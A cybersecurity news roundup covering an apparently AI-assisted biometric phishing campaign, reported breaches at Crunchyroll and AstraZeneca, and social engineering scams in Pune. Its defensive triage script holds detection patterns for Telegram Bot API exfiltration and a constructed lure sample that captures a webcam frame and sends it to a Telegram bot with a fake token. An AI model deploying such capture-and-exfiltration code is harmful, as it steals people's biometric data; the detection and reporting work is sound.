The cybersecurity landscape faces new threats daily. AI-driven attacks, data breaches, and social engineering scams are on the rise. This report delves into the latest incidents, from Europe’s geopolitical cyber threats to global phishing campaigns and high-profile breaches at Crunchyroll and AstraZeneca.
Global AI-Assisted Phishing Campaign
Cyble, an AI-powered cyber threat intelligence firm, has uncovered a global phishing campaign that exploits browser permissions to harvest biometric data, including facial images, audio recordings, and device telemetry. Unlike traditional phishing attacks targeting login credentials, this campaign abuses legitimate browser APIs (the same camera and microphone permission prompt that video-conferencing sites rely on) to trick users into granting access to their cameras and microphones under false pretenses, such as “identity verification” or “service recovery”. No browser exploit is involved: the victim authorizes the capture, so the defense is skepticism about the request rather than a patch.
Key findings from Cyble’s research:
- AI-enhanced development: The campaign’s code contains structured annotations and emoji-based formatting, which Cyble reads as a sign that generative AI tools were used to accelerate payload creation. Treat this as a stylistic signal rather than proof; it is useful for clustering samples, not for attribution on its own.
- Biometric harvesting: Because the capture runs through the browser’s own permission prompt, the attacker needs no vulnerability, only consent. The exfiltrated high-resolution facial images and audio can be weaponized for deepfake attacks or to defeat Video-KYC (Know Your Customer) checks.
- Abuse of trusted brands: The campaign impersonates platforms like TikTok, Telegram, Instagram, and Google Chrome, using lures such as “ID Scanners” and “Health Fund AI” to gain user trust.
- Scalable infrastructure: Threat actors utilize edgeone.app for low-cost hosting and Telegram Bot APIs for data exfiltration, so taking down a single page or bot does little. The most durable artifact in each sample is the Telegram bot token embedded in the page, which is worth extracting for reporting and for blocking.
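The indicators above (a camera/microphone request, frame capture, a Telegram Bot API URL, edgeone.app hosting, a KYC-style pretext, emoji-decorated comments) are exactly what an analyst greps a suspected page for. As an added example, not Cyble’s tooling and not code from the campaign, the script below runs that triage over a page’s JavaScript, weights the hits so that a legitimate video-call page is not flagged for merely calling getUserMedia, pulls out the bot id (with the token redacted) and lists the external hosts the page talks to, which is the input for the egress block recommended below. Both sample scripts are constructed for the example; the token in the lure is fake.

```javascript
'use strict';
// Added example: static triage of a suspected biometric-phishing page.
// Not Cyble's code and not the campaign's; indicator list, weights and
// both samples are constructed here to mirror the behaviours described.

// Each indicator is a regex over the page's JavaScript plus a weight.
// Exfiltration patterns weigh more than generic media use, because
// legitimate video-call pages also call getUserMedia.
const INDICATORS = [
  { name: 'media_capture',    weight: 1, re: /navigator\.mediaDevices\.getUserMedia\s*\(/ },
  { name: 'frame_grab',       weight: 2, re: /\b(?:toDataURL|toBlob|captureStream|MediaRecorder)\b/ },
  { name: 'telegram_bot_api', weight: 4, re: /api\.telegram\.org\/bot\d+:[A-Za-z0-9_-]+\/send(?:Photo|Document|Message|Audio|Voice|Video)\b/ },
  { name: 'edgeone_hosting',  weight: 1, re: /\b[a-z0-9-]+\.edgeone\.app\b/i },
  { name: 'kyc_pretext',      weight: 1, re: /identity verification|verify your identity|service recovery|id scanner/i },
  // Emoji inside code comments: the weak "AI-assisted authoring" signal from the report.
  { name: 'emoji_comment',    weight: 1, re: /\/\/[^\n]*[\u{1F300}-\u{1FAFF}]/u },
];

// Bot id plus a redacted token prefix from a Telegram Bot API URL, if present.
// The full token is deliberately not returned; it belongs in the report to Telegram.
function extractTelegramBot(source) {
  const m = source.match(/api\.telegram\.org\/bot(\d+):([A-Za-z0-9_-]+)\//);
  if (!m) return null;
  return { botId: m[1], tokenPrefix: m[2].slice(0, 4) + '...' };
}

// Every absolute http(s) host the page references: candidates for an egress block.
function externalHosts(source) {
  const hosts = [...source.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)].map(m => m[1].toLowerCase());
  return [...new Set(hosts)];
}

function triageScript(source) {
  const matched = INDICATORS.filter(i => i.re.test(source));
  const score = matched.reduce((sum, i) => sum + i.weight, 0);
  const verdict = score >= 6 ? 'likely-biometric-phish' : score >= 3 ? 'suspicious' : 'benign';
  return {
    hits: matched.map(i => i.name),
    score,
    verdict,
    telegram: extractTelegramBot(source),
    externalHosts: externalHosts(source),
  };
}

// Constructed lure page, modelled on the report's description (fake token).
const SAMPLE_LURE = `
// 📸 Step 1: open the camera for "identity verification"
async function verifyIdentity() {
  const stream = await navigator.mediaDevices.getUserMedia({ video: true, audio: true });
  const video = document.getElementById('cam');
  video.srcObject = stream;
  const canvas = document.createElement('canvas');
  canvas.getContext('2d').drawImage(video, 0, 0);
  const photo = await new Promise(r => canvas.toBlob(r, 'image/jpeg', 0.95));
  const form = new FormData();
  form.append('chat_id', '000000000');
  form.append('photo', photo, 'face.jpg');
  await fetch('https://api.telegram.org/bot1234567890:AAEfakeTokenForExampleOnly0123456789/sendPhoto',
              { method: 'POST', body: form });
}`;

// Constructed benign page: a video call that streams to its own origin.
const SAMPLE_CALL_PAGE = `
async function joinCall(roomId) {
  const stream = await navigator.mediaDevices.getUserMedia({ video: true, audio: true });
  document.getElementById('self').srcObject = stream;
  await fetch('/api/rooms/' + roomId + '/join', { method: 'POST', credentials: 'same-origin' });
}`;

console.log(JSON.stringify(triageScript(SAMPLE_LURE), null, 2));
console.log(JSON.stringify(triageScript(SAMPLE_CALL_PAGE), null, 2));
```

The weights are the assumption to adjust for your own corpus: a page that only requests media scores 1 and is left alone, while the combination of frame capture and a Telegram send endpoint is what pushes a sample into the flagged band. The `externalHosts` list is what you feed into a proxy or firewall deny rule for networks where api.telegram.org has no legitimate use.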
Business impact: The stolen data enables:
- Account takeovers (ATO): Harvested face and voice samples can be replayed against remote identity-verification systems, including Video-KYC.
- Extortion and fraud: Captured multimedia fuels blackmail or Business Email Compromise (BEC) schemes.
- Reputational damage: Misuse of brand identities erodes trust in digital onboarding processes.
Recommendations: Cyble advises users to deny unexpected camera and microphone permission requests, and organizations to monitor for look-alike domains and suspicious hosting and to restrict outbound traffic to APIs that have no business use on their networks, such as the Telegram Bot API. For more details, read the full press release here.
Data Breaches at Crunchyroll and AstraZeneca
Popular anime streaming platform Crunchyroll is reportedly the victim of a significant data breach, with subscriber information—including emails, credit card details, and IP addresses—leaked online. According to an unverified report by International Cyber Digest on X (formerly Twitter), the breach originated from a third-party service provider, Telus, whose employee allegedly introduced malware into Crunchyroll’s ticketing system.
Key details:
- The attack occurred on March 12, 2026, but Crunchyroll reportedly took 24 hours to detect the breach.
- The threat actor claimed to have contacted Crunchyroll but received no response, prompting public disclosure.
- Sample data includes credit card details, email addresses, and support tickets, raising concerns about identity theft and financial fraud.
- Crunchyroll is also facing a class-action lawsuit in the U.S. for allegedly sharing user data with third-party marketing firms, further damaging its reputation.
As of now, Crunchyroll has not issued an official statement, leaving subscribers in limbo. Users are advised to monitor their financial accounts, change passwords if they suspect exposure, and be wary of any “follow-up” e-mail that references an old support ticket, since ticket contents are among the sample data. For updates, follow the story here.
The notorious hacking collective LAPSUS$ has resurfaced, allegedly breaching multinational pharmaceutical giant AstraZeneca. The group claims to have exfiltrated 3GB of internal data, including source code, cloud infrastructure configurations, and cryptographic keys, and is attempting to sell the dump via private channels.
Compromised assets breakdown:
- Source code: Java Spring Boot applications, Angular frontend frameworks, and Python scripts.
- Cloud infrastructure: Terraform configurations for AWS and Azure, alongside Ansible roles for automation.
- Secrets and access: Private cryptographic keys, Vault credentials, and authentication tokens for GitHub and Jenkins CI/CD pipelines.
- Supply chain portal: The breach includes data from an internal supply-chain portal (als-sc-portal-internal), which manages forecasting, inventory tracking, SAP integration, and delivery metrics.
LAPSUS$ has shared screenshots and password-protected samples as proof, but AstraZeneca has not yet confirmed the breach. If the claim holds, the CI/CD tokens and Vault credentials in the dump would let an intruder reach build pipelines and secret stores well beyond the leaked repositories, and the supply-chain portal data could disrupt pharmaceutical distribution. The credentials named in the listing should be rotated whether or not the full dump proves authentic. Security researchers are monitoring the situation closely. For technical details, read the full report here.
Both incidents highlight the critical need for robust cybersecurity measures, especially in protecting sensitive user data and infrastructure. For more insights into data breaches and their mitigation, refer to the article on understanding and mitigating data breaches.
Social Engineering Scams in India: The Human Factor
India is experiencing a surge in social engineering scams, where fraudsters manipulate human psychology rather than exploiting technical vulnerabilities. According to reports from Pune, scammers are using deepfake voices, fake authority figures, and urgency tactics to defraud victims of lakhs of rupees. The same reports put nearly 60% of cyber breaches in India down to human error or manipulation, which makes awareness critical.
Recent cases in Pune:
- Franchise scam: A victim lost Rs 5.79 lakh after fraudsters promised a “ready-made online business” with guaranteed returns. Payments were extracted in stages under various pretexts (registration fees, activation charges) before the scammers disappeared.
- OTP trap: An 81-year-old man lost Rs 3 lakh after sharing an OTP to “confirm” an electric burner order. The fraudster used the OTP to drain his bank account via unauthorized transactions.
- APK file scam: A victim in Hadapsar lost Rs 3.53 lakh after installing a malicious APK file sent by scammers impersonating American Express. The file granted remote access to the victim’s device, enabling fraudulent transactions.
Evolving tactics:
- AI-powered personalization: Scammers use deepfake voices and AI-generated emails to mimic trusted contacts, which makes the approach far harder to distinguish from a genuine one.
- Psychological triggers: Fraudsters exploit authority (police, bank officials), urgency (‘act now or face arrest’), fear (‘your account is compromised’), and greed (‘high-return investments’). These tactics prey on victims’ emotional responses, making them more susceptible to deception.
- Long-term trust building: Some scams involve weeks of interaction before requesting money, making them harder to detect. Scammers build trust over time, often pretending to be friends or business partners.
Vulnerable groups in Pune:
- Students: Targeted via fake job/internship offers. Students, often inexperienced and eager for opportunities, are easy targets for scammers posing as legitimate employers.
- IT professionals: Lured into trading or investment frauds. Their familiarity with technology and financial markets makes them attractive targets for sophisticated investment scams.
- Elderly citizens: Vulnerable to impersonation and APK scams. Elderly individuals, less tech-savvy and more trusting, are often victimized by scams that exploit their lack of digital literacy.
Prevention tips:
- Never share OTPs, PINs, or banking details. This basic advice is often ignored, leading to significant financial loss.
- Verify calls claiming to be from banks or police via official channels. Double-checking can prevent falling victim to impersonation scams.
- Avoid downloading apps from untrusted sources. Stick to official app stores to minimize the risk of installing malicious software.
- Report scams immediately to the National Cyber Crime Helpline (1930) or cybercrime.gov.in. Prompt reporting can help authorities track and apprehend scammers.
As Adv. Rajas Pingle, a cybersecurity expert, notes: *“The biggest defense against cybercrime is not software, but awareness. If you pause, question, and verify, most scams fail instantly.”* For more on Pune’s cybercrime landscape, read the full report here and here.
Final words
The cybersecurity landscape is evolving at an alarming pace, with AI-driven attacks, state-sponsored espionage, and social engineering scams becoming the norm. Biometric data is now a prime target for identity theft and deepfake fraud, and it cannot be rotated the way a password can. Supply chain exposure and human error continue to pose significant risks. Collaboration between governments, businesses, and individuals is essential to mitigate these threats. Stay updated and report incidents promptly to limit the damage.
